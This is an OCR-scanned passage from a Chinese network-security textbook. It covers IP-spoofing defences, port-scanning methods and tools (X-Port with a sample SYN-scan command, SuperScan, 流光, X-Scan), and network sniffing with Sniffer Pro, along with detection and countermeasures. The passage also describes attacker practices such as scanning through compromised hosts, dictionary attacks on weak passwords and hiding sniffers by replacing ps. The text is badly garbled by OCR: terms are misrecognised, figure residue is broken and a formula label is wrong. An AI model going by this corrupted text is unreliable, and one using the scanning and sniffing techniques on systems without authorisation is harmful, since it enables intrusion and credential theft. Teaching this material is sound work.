件 。 这 将 迫使 所 有 用 户 使 用 其 他 远程 通信 手段 ， 如 Telnet、SSH、Skey 等 。 

(3) 进行 包 过 滤 。 如 果 网 络 是 通过 路 由 器 接 入 Intemet 的 ， 那 么 可 以 利用 路 由 器 来 进 
行 包 过 滤 。 确 信 只 有 您 的 内 部 LAN 可 以 使 用 信任 关系 ， 而 内 部 LAN 上 的 主机 对 于 LAN 
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以 外 的 主机 要 慎重 处 理 。 您 的 路 由 器 可 以 帮助 您 过 滤 掉 所 有 来 自 于 外 部 而 希望 与 内 部 建立 
连接 的 请 求 。 

(4) 使 用 加 密 方法 。 阻止 IP 欺骗 的 另 一 种 明显 的 方法 是 在 通信 时 要 求 加 密 传输 和 验 
证 。 当 有 多 种 手段 并 存 时 ， 加 密 方法 最 为 适用 。 

(5) 使 用 随机 化 的 初始 序列 号 。 黑 客 攻击 得 以 成 功 实现 的 一 个 很 重要 的 因素 就 是 序列 
号 不 是 随机 选择 的 或 随机 增加 的 。Bellovin 描述 了 一 种 弥补 TCP 不 足 的 方法 ， 就 是 分 割 序 
列 号 空间 。 每 一 个 连接 将 有 自己 独立 的 序列 号 空间 。 序 列 号 将 仍然 按照 以 前 的 方式 增加 ， 
但 是 在 这 些 序列 号 空间 中 没有 明显 的 关系 。 可 以 通过 下 列 公 式 来 说 明 : 

ISN=M+F(localhost, localport, remotehost, remoteport ) 

式 中 : M 为 4 微 秒 定时 器 ; E 为 加 密 Hash 函数 。 

F 产生 的 序列 号 ， 对 于 外 部 来 说 是 不 应 该 能 够 被 计算 出 或 者 被 猜测 出 的 。Bellovin 建 
议 F 是 一 个 结合 连接 标识 符 和 特殊 矢量 (随机 数 ， 基 于 启动 时 间 的 密码 ) 的 Hash 函数 。 


3.4 端口 扫描 


3.4.1 原理 

1. 端口 扫描 原理 

尝试 与 目标 主机 的 某 些 端口 建立 连接 , 如果 目标 主机 该 端口 有 回复 ( 见 三 次 握手 中 的 第 
二 次 )， 则 说 明 该 端口 开放 ， 即 为 “活动 端口 ”。 

2. 扫描 原理 分 类 


1) 全 TCP 连接 

这 种 扫描 方法 使 用 三 次 握手 ， 与 目标 计算 机 建立 标准 的 TCP 连接。 需要 说 明 的 是 ， 这 
种 古老 的 扫描 方法 很 容易 被 目标 主机 记录 。 

2) ” 半 打 开 式 扫描 (SYN 扫描 ) 

在 这 种 扫描 技术 中 , 扫描 主机 自动 向 目标 计算 机 的 指定 端口 发 送 SYN 数据 段 , 表示 发 
送 建立 连接 请 求 。 

(1) 如 果 目 标 计算 机 的 回应 TCP 报 文中 SYN=1，ACK=1， 则 说 明 该 端口 是 活动 的 ， 
接着 扫描 主机 传送 一 个 RST 给 目标 主机 拒绝 建立 TCP 连接 ， 从 而 导致 三 次 握手 过 程 的 
失败 。 

(2) 如 果 目 标 计 算 机 的 回应 是 RST， 则 表示 该 端口 为 “ 死 端 口 ”， 这 种 情况 下 ， 扫 描 
主机 不 用 做 任何 回应 。 由 于 扫描 过 程 中 ， 全 连接 尚未 建立 ， 所 以 大 大 降低 了 被 目标 计算 机 
记录 的 可 能 ， 并 且 加快 了 扫描 的 速度 。 

3) FIN 扫描 

在 前 面 介绍 过 的 TCP 报 文中 ， 有 一 个 字段 为 FIN，FIN 扫描 则 依靠 发 送 FIN 来 判断 目 
标 计算 机 的 指定 端口 是 否 活动 。 发 送 一 个 FIN=1 的 TCP 报 文 到 一 个 关闭 的 端口 时 , 该 报 文 
会 被 丢掉 ， 并 返回 一 个 RST 报 文 。 但是， 如 果 当 FIN 报 文 到 一 个 活动 的 端口 时 ， 该 报 文 只 
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是 简单 的 丢掉 ， 不 会 返回 任何 回应 。 从 FIN 扫描 可 以 看 出 ， 这 种 扫描 没有 涉及 任何 TCP 连 
接 部 分 ， 因 此 ， 这 种 扫描 比 前 两 种 都 安全 ， 可 以 称 为 秘密 扫描 。 

人 第 三 方 扫描 

第 三 方 扫描 又 称 “ 代 理 扫描 ”， 这 种 扫描 是 利用 第 三 方 主机 来 代替 入 侵 者 进行 扫描 。 
这 个 第 三 方 主机 一 般 是 入 侵 者 通过 入 侵 其 他 计算 机 而 得 到 的 ， 该 “第 三 方 ”主机 常 被 入 侵 
者 称 为 “肉鸡 ”， 这 些 “ 肉 鸡 ” 一 般 为 安全 防御 系数 极 低 的 个 人 计算 机 。 


3.4.2 方法 (或 工具 ) 


端口 扫描 的 工具 很 多 ， 常 用 的 端口 扫描 工具 有 : X-Port、PortScanner、SuperScan 流光 、 
XScan 等 。 
(1) X-Port: 多 线程 方式 扫描 目标 主机 开放 端口 ， 扫 描 过 程 中 根据 TCP/IP 堆栈 特征 被 
动 识别 操作 系统 类 型 , 车 没有 匹配 记录 ,尝试 通过 NetBIOS 判断 是 否 为 Windows 系列 操作 
系统 并 尝试 获取 系统 版 本 信息 。 
提供 两 种 端口 扫描 方式 : 标准 TCP 连接 扫描 、SYN 方式 扫描 。 其 中 “SYN 扫描 ”和 
“被 动 识别 操作 系统 ”功能 均 使 用 Raw Socket 构造 数据 包 ， 不 需要 安装 额外 驱动 ， 但 必须 
运行 于 Windows 2000 系统 之 上 。 
用 法 : 
xport <Host> <ports scope> [Options] 
<ports scope> means: 
<start port>[-<end port>]{,portl,port2-port3,...} 
[Options] means: 
-m [mode]: specify scan mode (tcp/syn), default is tcp connect 


mode 
-t [count]: specify threads count, default is 50 
= : display verbose information 
例 : xport www.***.com 1-1024 -m syn。 
(2) PortScanner: 是 由 StealthWasp 编写 的 基于 图 形 界面 的 端口 扫描 软件 。 在 Target ip 
填 入 目标 p， 在 Scan port 填 入 扫描 端口 范围 ， 单 击 scan 开始 扫描 。 
(3) SuperScan: 是 一 个 集 “ 端 口 扫 描 ”、ping、“ 主 机 名 解析 ”于 一 体 的 扫描 器 。 
功能 : 检测 主机 是 否 在 线 ; IP 和 主机 名 之 间 的 相互 转换 ; 通过 TCP 连接 试探 目标 主机 
运行 的 服务 ， 扫 描 指定 范围 的 主机 端口 ， 支 持 使 用 文件 列表 来 指定 扫描 主机 范围 。 
(4) 流光 : 小 榕 编写 的 一 款 扫描 工具 ， 主 要 有 如 下 功能 。 
用 于 检测 POP3/FTP 主机 中 用 户 密码 安全 漏洞 。 
163/169 双 通 。 
多 线程 检测 ， 消 除 系统 中 密码 漏洞 。 
高 效 的 用 户 流 模 式 。 
高 效 服务 器 流 模式 ， 可 同时 对 多 台 POP3/FTP 主机 进行 检测 。 
最 多 500 个 线程 探测 。 
线程 超时 设置 ， 阻 塞 线程 具有 自杀 功能 ， 不 会 影响 其 他 线程 。 
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。 ” 文 持 10 个 字典 同时 检测 。 

。 ”检测 设置 可 作为 项 目 保存 。 

(5) X-Scan: 采用 多 线程 方式 对 指定 了 P 地 址 段 (或 单机 ) 进 行 安全 漏洞 检测 ， 支 持 插件 
功能 。 扫 描 内 容 包括 : 远程 服务 类 型 、 操 作 系 统 类 型 及 版 本 、 各 种 弱 口令 漏洞 、 后 门 、 应 
用 服务 漏洞 、 网 络 设备 漏洞 、 拒 绝 服 务 漏洞 等 。 

X-Scan 包含 以 下 文件 。 

。 ”xscan guiexe: X-Scan 图 形 界面 主 程序 ; 

。 ”checkhost.dat: 插件 调度 主 程序 ; 

。 ”update.exe: 在 线 升级 主 程序 ; 

。 *.dll: 主 程序 所 需 动态 链接 库 ; 

。 使 用 说 明 .txt: X-Scan 使 用 说 明 ; 

。 /datlanguage.ini: 多 语言 配置 文件 ， 可 通过 设置 “LANGUAGE\SELECTED” 项 进 

行 语言 切换 ; 

e /datlanguage.*: 多 语言 数据 文件 ; 

。 /dat/config.ini: 当前 配置 文件 ， 用 于 保存 当前 使 用 的 所 有 设置 ; 

e。 /dat/*.cfg: 用 户 自 定义 配置 文件 ; 

。 /dat/*.dic: 用 户 名 /密码 字典 文件 ， 用 于 检测 弱 口令 用 户 ; 

。 /plugins: 用 于 存放 所 有 插件 (后 绥 名 为 .xpn); 

@ /scripts: 用 于 存放 所 有 NASL 脚本 (后 级 名 为 .nasl); 

@ /scripts/desc: 用 于 存放 所 有 NASL 脚本 多 语言 描述 (后 级 名 为 .desc); 

e /scripts/cache: 用 于 缓存 所 有 NASL 脚本 信息 , 以 便 加 快 扫描 速度 (该 目录 可 删除 )。 

X-Scan 解压 后 即 可 运行 ，X-Scan 程序 的 主 界面 如 图 3-1 所 示 。 
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XSet 而 主 程序 
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言 切 执 
当前 机 轩 文 件 ， 用 于 保存 当前 使 用 


时 二 +， 用 于 检测 弱 


用 于 存放 所 有 插件 (后 如 名 为 . xpn) J 


3-1 X-Scan 程序 的 主 界面 


使 用 X-Scan 进行 扫描 之 前 ， 可 以 设置 扫描 参数 ， 选 择 “ 设 置 ”菜单 中 的 “扫描 参数 ” 
命令 ， 可 以 弹出 如 图 3-2 所 示 的 扫描 参数 窗口 ， 在 检测 范围 选项 中 设置 要 进行 扫描 的 了 地 
址 范围 。 

在 全 局 设置 选项 下 的 扫描 模块 选项 中 可 以 设置 对 哪些 服务 进行 扫描 ， 如 图 3-3 所 示 ; 
在 “并 发 扫描 ”选项 界面 中 可 以 设置 最 大 并 发 主机 数量 和 最 大 并 发 线程 数量 ， 如 图 3-4 所 
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示 ; “扫描 报告 ”选项 界面 中 可 以 设置 扫描 结果 的 格式 和 报告 的 文件 类 型 ， 可 以 设置 
成 html、.txt、.xml 三 种 格式 ， 如 图 3-5 所 示 。 


图 3-2 “扫描 参数 ”对 话 框 


图 3-3 ”扫描 模块 的 选择 


图 3-4 并 发 扫描 的 设置 


在 插件 设置 选项 下 的 端口 相关 设置 选项 中 可 以 设置 需要 进行 扫描 的 端口 、 检 测 方式 
(Tcp 或 Syn) 等 ， 如 图 3-6 所 示 。 同 时 还 可 以 进行 SNMP 相关 设置 、NETBIOS 相关 设置 、 
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川内 
漏洞 检测 脚本 设置 、CGI 相关 设置 、 字 典 文 件 设置 。 


图 3-6 扫描 端口 设置 


所 有 的 选项 都 设置 好 之 后 单 击 “确定 ”按钮 ， 回 到 主 界面 ， 单 击 “ 启 动 扫描 ”按钮 ， 
开始 进行 扫描 ， 如 图 3-7 所 示 。 扫 描 结束 后 会 生成 类 似 图 3-8 所 示 的 检测 报告 。 


图 3-7 启动 扫描 
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主机 地 址 。 端口 /服务 服务 漏洞 
locahost [hetps (443heep) 发 现 安 全 提示 
locahost microsoft-ds (445jtcp) 发 现 安全 警 省 
localhost tp (21ftcp) 发 现 安全 漏洞 
localhost Jsmtp (2Stcp) | 发 现 安全 提示 
network rip 
localhost (lozsftcp) 发 现 安全 提示 
locahost lunknown (8000/tcp) 发 现 安全 提示 
locahost Iwww (Boftcp) 发现 安全 提示 
图 3-8 检测 报告 


通过 检测 报告 分 析 扫 描 的 结果 ， 获 得 有 用 的 信息 。 


3.4.3 检测 和 防护 
可 以 采用 下 面 两 种 方法 防范 端口 扫描 。 
1. 关闭 闲置 的 和 有 潜在 危险 的 端口 


这 种 方法 的 本 质 是 将 所 有 用 户 需 要 用 到 的 正常 计算 机 端口 外 的 其 他 端口 都 关闭 掉 。 因 
为 就 黑客 而 言 ， 所 有 的 端口 都 可 能 成 为 攻击 的 目标 。 换 句 话说 ， 计 算 机 的 所 有 对 外 通信 的 
端口 都 存在 潜在 的 危险 ， 而 一 些 系统 必要 的 通信 端口 ， 如 访问 网 页 需要 的 HTTP(80 端口 )、 
QQ(4000 端口 ) 等 不 能 被 关闭 。 

在 Windows NT 核心 系统 (Windows 2000/XP/2003) 中 要 关闭 掉 一 些 闲 置 端 口 是 比 较 方 
便 的 ， 可 以 采用 “定向 关闭 指定 服务 的 端口 ”和 “只 开放 允许 端口 的 方式 ”。 计 算 机 的 一 
些 网 络 服务 会 有 系统 分 配 默 认 的 端口 ， 将 一 些 闲置 的 服务 关闭 掉 ， 其 对 应 的 端口 也 会 被 关 
闭 了 。 进 入 控制 面板 一 管理 工具 一 服务 项 内 ， 关 闭 掉 计算 机 的 一 些 没有 使 用 的 服务 (如 FTP 
服务 、DNS 服务 、IS Admin 服务 等 )， 它 们 对 应 的 端口 也 被 停 用 了 。 只 开放 允许 端口 的 方 
式 , 可 以 利用 系统 的 TCP/IP 筛选 功能 实现 ， 设 置 的 时 候 ， 只 允许 系统 的 一 些 基本 网 络 通信 
需要 的 端口 即 可 。 


2. 检查 各 端口 ， 有 端口 扫描 的 症状 时 ， 立 即 屏蔽 该 端口 


这 种 预防 端口 扫描 的 方式 用 户 自己 手工 是 不 可 能 完成 的 ， 或 者 说 完成 起 来 相当 困难 ， 
需要 借助 软件 ， 这 些 软 件 是 常用 的 网 络 防 火 墙 。 

防火 墙 的 工作 原理 是 : 首先 检查 每 个 到 达 你 的 计算 机 的 数据 包 ， 在 这 个 包 被 你 的 计算 
机 上 运行 的 任何 软件 检测 之 前 ,防火墙 有 完全 的 否决 权 ， 可 以 禁止 你 的 计算 机 接收 Internet 
上 的 任何 东西 。 当 第 一 个 请 求 建立 连接 的 包 被 你 的 计算 机 回应 后 ， 一 个 “TCP/IP 端口 ”被 
打开 ; 端口 扫描 时 ， 对 方 计算 机 不 断 和 本 地 计算 机 建立 连接 ， 并 逐渐 打开 各 个 服务 所 对 应 
的 “TCP/IP 端口 ”及 闲置 端口 ， 防 火 墙 经 过 自 带 的 拦截 规则 判断 ， 就 能 够 知道 对 方 是 否 正 
进行 端口 扫描 ， 并 拦截 掉 对 方 发 送 过 来 的 所 有 扫描 需要 的 数据 包 。 
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3.5 网 络 监听 


3.5.1 原理 


通常 ， 在 计算 机 网 络 上 交换 的 数据 结构 单位 是 数据 包 ， 而 在 以 太 网 (Etherneb 中 则 称 为 
帧 。 这 种 数据 包 是 由 记录 着 数据 包 发 送 给 对 方 所 必需 信息 的 报头 部 分 和 记录 着 发 送信 息 的 
报 文部 分 构成 。 报 头 部 分 包含 接收 端 地 址 、 发 送 端 地 址 、 数 据 校 验 码 等 信息 。 以 太 网 协议 
的 工作 方式 是 将 要 发 送 的 数据 包 发 往 连接 在 一 起 的 所 有 主机 。 通 常 只 有 与 数据 包 中 目标 地 
址 一 致 的 那 台 主 机 才能 接收 到 信息 包 。 但 是 当主 机 工作 在 监听 模式 下 ， 不 管 数据 包 中 目标 
地 址 是 什么 ， 主 机 都 将 可 以 接收 到 。 在 许多 局 域 网 内 ， 有 十 几 台 甚至 上 百 台 主机 是 通过 双 
绞 线 、 交 换 机 连接 在 一 起 的 。 在 协议 的 高 层 或 者 用 户 看 来 ， 当 同一 网 络 中 的 两 台 主 机 通信 
的 时 候 ， 源 主机 将 写 有 目的 主机 地 址 的 数据 包 直接 发 向 目的 主机 ， 或 者 当 网 络 中 的 一 台 主 
机 同 外 界 的 主机 通信 时 ， 源 主机 将 写 有 目的 主机 他 地 址 的 数据 包 发 向 网 关 。 但 是 ， 这 种 数 
据 包 并 不 能 在 协议 栈 的 高 层 直 接 发 送出 去 ， 要 发 送 的 数据 包 必 须 从 TCP/IP 协议 的 他 层 交 
给 网 络 接口 ， 也 就 是 所 说 的 数据 链 路 层 。 网 络 接口 不 会 识别 瑟 地 址 。 在 网 络 接口 由 了 王 层 
来 的 带 有 也 地 址 的 数据 包 又 增加 了 一 部 分 以 太 帧 的 帧 头 信息 。 在 帧 头 中 ， 有 两 个 域 分 别 为 
只 有 网 络 接口 才能 识别 的 源 主 机 和 目的 主机 的 物理 地 址 ， 这 是 一 个 48 位 的 地 址 ， 这 个 48 
位 的 地 址 是 与 瑟 地址 相对 应 的 ， 即 一 个 下 地 址 对 应 一 个 物理 地 址 。 对 于 作为 网 关 的 主机 ， 
由 于 它 连 接 了 多 个 网 络 ， 也 就 同时 具备 了 多 个 人 P 地 址 ， 在 每 个 网 络 中 都 有 一 个 。 发 向 网 络 
外 的 帧 中 携带 的 就 是 网 关 的 物理 地 址 。 

在 Ethernet 中 填写 了 物理 地 址 的 帧 从 网 络 接口 ( 即 网 卡 中 ) 发 送出 去 , 并 传送 到 物理 线路 
上 。 如 果 局 域 网 是 由 粗 缆 (10Base5) 或 细 缆 (10Base2) 连 接 的 共享 式 以 太 网 络 ， 那 么 数字 信和 号 
在 电缆 上 传输 时 就 能 够 到 达 线路 上 的 每 台 主机 。 而 当 使 用 交换 机 时 ， 发 送出 去 的 信号 先 到 
达 集 线 器 ， 再 由 交换 机 发 向 连接 在 交换 机 上 的 每 条 线路 ， 这 样 在 物理 线路 上 传输 的 数字 信 
号 就 能 到 达 连 接 在 交换 机 上 的 每 台 主机 了 。 当 数字 信号 到 达 一 台 主 机 的 网 络 接口 时 ， 正 常 
状态 下 网 络 接口 对 读 入 数据 帧 进行 检查 ， 如 果 数 据 帧 中 携带 的 物理 地 址 是 自己 的 地 址 或 者 
物理 地 址 是 广播 地 址 ， 那 么 就 会 将 数据 帧 交 给 人 P 层 软件 。 对 于 每 个 到 达 网 络 接口 的 数据 帧 
都 要 重复 这 个 过 程 。 但 是 当主 机 工作 在 监听 模式 时 ， 所 有 的 数据 帧 都 将 被 交 给 上 层 协议 软 
件 处 理 。 

当 连 接 在 同一 条 电缆 或 交换 机 上 的 主机 被 逻辑 地 分 为 几 个 子 网 的 时 候 ， 如 果 有 一 台 主 
机 处 于 监听 模式 , 它 还 可 以 接收 到 发 向 与 自己 不 在 同一 个 子 网 (使 用 了 不 同 的 掩 码 、IP 地 址 
和 网 关 ) 的 主机 的 数据 包 ， 在 同一 个 物理 信道 上 传输 的 所 有 信息 都 可 以 被 接收 到 。 

在 UNIX 系统 上 ， 当 拥有 超级 权限 的 用 户 欲 使 自己 控制 的 主机 进入 监听 模式 ， 只 需 向 
Interface( 网 络 接口 ) 发 送 IO 控制 命令 ， 就 可 以 使 主机 设置 成 监听 模式 了 。 而 在 Windows 系 
统 中 ， 则 不 论 用 户 是 否 有 权限 ， 都 将 可 以 通过 直接 运行 监听 工具 实现 。 

在 网 络 监听 时 ， 常 常 要 保存 大 量 的 信息 (也 包含 很 多 垃圾 信息 )， 并 对 收集 的 大 量 信息 
进行 整理 ， 这 样 就 会 使 正在 监听 的 计算 机 对 其 他 用 户 的 请 求 响应 变 得 很 慢 。 同 时 监听 程序 
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在 运行 时 需要 消耗 大 量 的 处 理 器 时 间 ， 如 果 此 时 就 详细 分 析 包 中 内 容 ， 许 多 包 就 会 来 不 及 
接收 而 漏 掉 。 所 以 很 多 时 候 监听 程序 会 将 监听 得 到 的 包 存放 在 文件 中 等 待 以 后 分 析 。 分 析 
监听 到 的 数据 包 是 项 繁重 的 工作 ， 因 为 网 络 中 的 数据 包 都 非常 复杂 。 两 台 主机 之 间 连 续 发 
送 和 接收 数据 包 ， 在 监听 到 的 结果 中 必然 会 增加 一 些 与 别 的 主机 进行 交互 的 数据 包 。 监 听 
程序 将 同一 TCP 会 话 的 包 整 理 到 一 起 已 相当 不 易 ， 若 还 期 望 将 用 户 详细 信息 整理 出 来 ， 就 
需要 根据 协议 对 包 进 行 大 量 分 析 。Intemet 上 的 协议 非常 多 ， 运 行 监听 程序 将 会 使 计算 机 变 
得 很 慢 且 占用 大 量 磁盘 空间 用 于 存储 监听 到 的 数据 包 。 

现在 网 络 中 所 使 用 的 协议 都 是 较 早 前 设计 的 ， 许 多 协议 的 实现 都 是 基于 通信 双方 的 充 
分 信任 。 在 通常 的 网 络 环境 下 ， 用 户 的 信息 (包括 口令 ) 都 是 以 明文 的 方式 在 网 上 传输 的 ， 
因此 进行 网 络 监听 从 而 获得 用 户 信息 并 不 难 , 只 要 掌握 初步 的 TCP/PP 协议 知识 即 可 以 轻松 
地 监听 到 所 需 信息 。 目 前 ， 网 络 监 听 主 要 用 于 局 域 网 ， 在 广域网 里 也 可 以 监听 和 截获 到 一 
些 用 户 信息 ， 但 更 多 信息 的 截获 要 依赖 于 配备 专用 接口 的 专用 工具 。 


3.5.2 方法 (或 工具 ) 


由 于 运行 监听 程序 的 主机 在 进行 监听 的 过 程 中 只 是 被 动 地 接收 以 太 网 中 传输 的 信息 ， 
不 会 占用 其 他 主机 来 交换 信息 ， 也 不 能 修改 在 网 络 中 传输 的 信息 包 ， 因 此 要 对 网 络 监听 进 
行 检测 很 复杂 。 

在 UNIX 或 Linux 操作 系统 中 , 一般 可 以 通过 命令 ps-ef 或 者 ps-aux 来 检测 。 在 Windows 
系统 中 ， 可 以 通过 同时 按 Ctrl+Altt+Del 组 合 键 ， 切 换 到 进程 一 栏 进行 监视 。 但 在 UNIX 或 
Linux 操作 系统 中 ,大 多 运行 监听 程序 的 人 都 会 通过 修改 ps 命令 来 防止 被 ps-ef 命 令 检测 到 。 
修改 ps 命令 只 需 儿 个 shell 程序 将 监听 程序 的 名 称 过 滤 掉 即 可 。 

上 节 提 到 过 ， 当 运行 监听 程序 时 ， 主 机 响应 一 般 会 因 受到 影响 而 变 得 非常 缓慢 ， 所 以 
也 可 以 根据 主机 的 响应 速度 来 判断 是 否 受 到 监听 。 但 由 于 目前 许多 程序 的 运行 可 以 导致 计 
算 机 变 得 很 慢 ， 因 此 该 方法 正确 率 很 低 。 

如 果 怀 疑 网 内 某 台 计算 机 正在 对 网 络 进行 监听 , 可 以 用 正确 的 下 地址 和 错误 的 物理 地 
址 去 ping 它 ， 这 样 正在 运行 的 监听 程序 就 会 做 出 响应 。 这 是 因为 正常 的 计算 机 一 般 不 接收 
错误 的 物理 地 址 的 ping 信息 ， 但 正在 进行 监听 的 计算 机 就 可 以 接收 。 不 过 这 种 方法 对 很 多 
系统 是 没有 效果 的 ， 因 为 它 依赖 于 系统 的 卫 stack。 另 一 种 方法 就 是 向 网 上 发 大 量 不 存在 的 
物理 地 址 的 包 ， 监 听 程 序 往往 就 会 对 这 些 包 进 行 处 理 ， 这 样 就 会 导致 计算 机 性 能 下 降 ， 可 
以 用 icmp echo delay 来 判断 和 比较 。 还 可 以 通过 搜索 网 内 所 有 主机 上 运行 的 程序 ， 但 这 样 
做 的 难度 极 大 ， 因 为 工作 量 很 大 ， 而 且 还 不 能 同时 检查 所 有 主机 的 进程 。 

在 UNIX 中 可 以 通过 ps-aun 或 ps-augx 命令 产生 一 个 包括 所 有 进程 的 清单 : 进程 的 属 
主 和 这 些 进 程 占用 的 处 理 器 时 间 和 内 存 等 。 这 些 都 可 以 以 标准 表 的 形式 输出 在 标准 输出 设 
备 上 。 如 果 某 一 进程 正在 运行 ， 那 么 它 将 会 列 在 这 张 清单 中 。 但 很 多 黑客 在 运行 监听 程序 
时 会 毫 不 客气 地 将 ps 或 其 他 运行 中 的 程序 修改 成 Trojan Horse 程序 ， 这 时 上 述 方法 就 无 效 
了 。 但 这 样 做 在 有 些 时 候 还 是 起 作用 的 ， 因 为 在 UNIX 与 Windows NT/2000/XP 上 ， 很 容 
易 得 到 当前 进程 的 清单 ， 但 DOS、Windows 9x 很 难 做 到 。 

监听 一 般 只 针对 用 户口 令 等 敏感 信息 ， 所 以 对 用 户 信息 和 口令 信息 进行 加 密 是 完全 有 
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必要 的 ， 可 以 防止 以 明文 传输 时 被 监听 到 。 目 前 ,在 网 络 中 SSH( 一 种 在 应 用 环境 中 提供 保 
密 通 信 的 协议 ) 通 信 协 议 被 广泛 使 用 ，SSH 所 使 用 的 端口 是 22， 它 排除 了 在 不 安全 信道 上 
通信 的 信息 被 监听 的 可 能 性 。 它 使 用 了 RAS 算法 ， 在 授权 过 程 结束 后 ， 所 有 的 传输 都 用 
IDEA 技术 加 密 。 

在 Windows 环境 下 ， 常 用 的 网 络 监听 工具 有 Netxray 和 Sniffer pro。 在 UNIX 环境 下 ， 
常用 的 监听 工具 有 Sniffit、Snoop、Tcpdump、Dsniff 等 。 下 面 介绍 一 下 Sniffer pro 的 使 用 。 

Sniffer pro 的 主要 功能 有 : 捕获 网 络 流量 进行 详细 分 析 ( 报 文 捕获 )、 利 用 专家 分 析 系 统 
诊断 问题 、 实 时 监控 网 络 活动 (网 络 监 视 )、 收 集 网 络 利 用 率 和 错误 等 。 下 面 主要 介绍 报 文 
捕获 和 网 络 监视 。 

在 进行 流量 捕获 之 前 首先 选择 网 络 适配器 ， 确 定 从 计算 机 的 哪个 网 络 适配器 上 接收 数 
据 。 具 体操 作 是 选择 文件 菜单 一 选 定 设置 ， 弹 出 如 图 3-9 所 示 的 “当前 设置 ”对 话 框 ， 选 
择 网 络 适 配器 。 
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图 3-9 选择 网 络 适配器 
报 文 捕获 功能 可 以 在 报 文 捕获 面板 中 进行 完成 ， 捕 获 面板 如 图 3-10 所 示 。 


3-10 报 文 捕获 面板 


在 捕获 过 程 中 可 以 通过 查看 如 图 3-11 所 示 面 板 查看 捕获 报 文 的 数量 和 缓冲 区 的 利用 
率 ， 单 击 Capture 菜单 ， 选 择 capture panel 命令 ， 可 以 打开 图 3-11 所 示 面 板 。 

Sniffer 软件 提供 了 强大 的 分 析 能 力 和 解码 功能 。 如 图 3-12 所 示 ， 对 于 捕获 的 报 文 提 供 
了 一 个 Expert( 专 家 ) 分 析 系 统 进行 分 析 ， 还 有 解码 系统 、 图 形 分 析 和 表格 的 统计 信息 。 进 行 
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击 捕获 停止 并 查看 按钮 可 以 调 出 如 图 3-12 所 示 的 窗口 。 


捕获 报 文 的 数 
据 缓冲 大 小 


详细 统计 信息 


3-11 捕获 面板 
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3-12 专家 分 析 系 统 


可 以 自行 设置 捕获 条 件 ， 分 为 基本 捕获 条 件 、 高 级 捕获 条 件 和 任意 捕获 条 件 。 
1. 基本 捕获 条 件 


基本 捕获 条 件 有 下 列 两 种 (如 图 3-13 所 示 )。 
(1) 链 路 层 捕获 , 按 源 MAC 和 目的 MAC 地址 进行 捕获 。 输 入 方式 为 十 六 进 制 连续 输 
入 ， 如 00EOFC123456。 


DP 


层 捕获 ， 按 源 瑟 和 目的 卫 进行 捕获 。 输 入 方式 为 点 间隔 方式 ， 如 10.107.1.1。 
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如 果 选 择 人 Pp 层 捕获 条 件 则 ARP 等 报 文 将 被 过 滤 掉 。 


图 3-13 基本 捕获 条 件 


2. 高 级 捕获 条 件 
在 Advanced 选项 卡 中 ， 你 可 以 编辑 你 的 协议 捕获 条 件 ， 如 图 3-14 所 示 。 
Dofine Filter dd 


Sumary| Mdress | Dats Fattera hdvancad |EwfEor | 


图 3-14 高 级 捕获 条 件 
在 协议 选择 树 中 可 以 选择 需要 捕获 的 协议 条 件 ， 如 果 什么 都 不 选 , 则 表示 忽略 该 条 件 ， 
捕获 所 有 协议 。 
在 设置 捕获 帧 长 度 条 件 的 下 拉 列 表 杠 中， 可 以 选择 捕获 等 于 、 小 于 、 大 于 某 个 值 的 报 文 。 
在 设置 错误 帧 是 否 捕获 选项 组 中 ， 可 以 选择 当 网 络 上 出 现 何 种 错误 时 进行 捕获 。 
单 击 保存 过 滤 规 则 条 件 按钮 Profiles， 可 以 将 当前 设置 的 过 滤 规 则 进行 保存 ， 在 捕获 主 
面板 中 ， 可 以 选择 保存 的 捕获 条 件 。 


@ 
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任意 捕获 条 件 
在 Data Patterm 选项 卡 ， 可 以 编辑 任意 捕获 条 件 ， 如 图 3-15 所 示 。 
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Sunnary | Address Data Pattern |Advanced | Buffer 一 - 


Source = Stati on luawei 
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Add AND/OR | Togele AND/OR | Toezle NIT 
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3-15 ”任意 捕获 条 件 


用 这 种 方法 可 以 实现 复杂 的 报 文 过 滤 ， 但 很 多 时 候 是 得 不 偿 失 ， 有 时 截获 的 报 文本 就 
不 多 ， 还 不 如 自己 看 来 得 快 。 

网 络 监视 功能 能 够 时 刻 监视 网 络 统计 以 及 网 络 上 资源 的 利用 率 ， 并 能 够 监视 网 络 流量 
的 异常 状况 ， 在 这 里 主要 介绍 Dashboard 。 

Dashboard 可 以 监控 网 络 的 利用 率 、 流量 及 错误 报 文 等 内 容 。 通过 应 用 软件 可 以 清楚 查 
看 到 此 功能 ， 单 击 Monitor 菜单 ， 选 择 Dashboard 命令 ， 弹 出 如 图 3-16 所 示 的 Dashboard 
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3.5.3 ”检测 和 防护 


网 络 监听 是 很 难 被 发 现 的 ， 因 为 运行 网 络 监听 的 主机 只 是 被 动 地 接收 在 局 域 网 上 传输 
的 信息 ， 它 不 主动 地 与 其 他 主机 交换 信息 ， 也 没有 修改 在 网 上 传输 的 数据 包 。 


1. 对 可 能 存在 的 网 络 监听 的 检测 


(1) 对 于 被 怀疑 正在 运行 监听 程序 的 计算 机 ,用 正确 的 瑟 地 址 和 错误 的 物理 地 址 ping， 
运行 监听 程序 的 计算 机 就 会 有 响应 。 这 是 因为 正常 的 计算 机 不 接收 错误 的 物理 地 址 ， 处 理 
监听 状态 的 计算 机 能 接收 ， 但 如 果 它 的 IPstack 不 再 次 反 向 检查 的 话 ， 就 会 响应 。 

(2) 向 网 上 发 大 量 不 存在 的 物理 地 址 的 包 ， 由 于 监听 程序 要 分 析 和 处 理 大 量 的 数据 包 
会 占用 很 多 的 CPU 资源 ， 这 将 导致 性 能 下 降 ， 通 过 比较 前 后 该 计算 机 性 能 就 加 以 判断 。 这 
种 方法 难度 比较 大 。 

(3) 使 用 反 监 听 工 具 如 antisniffer 等 进行 检测 。 


2. 对 网 络 监听 的 防范 措施 


1) ”从 逻辑 或 物理 上 对 网 络 分 段 

网 络 分 段 通常 被 认为 是 控制 网 络 广 播 风 暴 的 一 种 基本 手段 ， 但 其 实 也 是 保证 网 络 安全 
的 一 项 措施 。 其 目的 是 将 非法 用 户 与 敏感 的 网 络 资源 相互 隔离 ， 从 而 防止 可 能 的 非法 监听 。 

2) ”以 交换 式 集线器 代替 共享 式 集线器 

对 局 域 网 的 中 心 交换 机 进行 网 络 分 段 后 ， 局 域 网 监听 的 危险 仍然 存在 。 这 是 因为 网 络 
最 终 用 户 的 接 入 往往 是 通过 分 支 集线器 而 不 是 中 心 交换 机 ， 而 使 用 最 广泛 的 分 支 集 线 器 通 
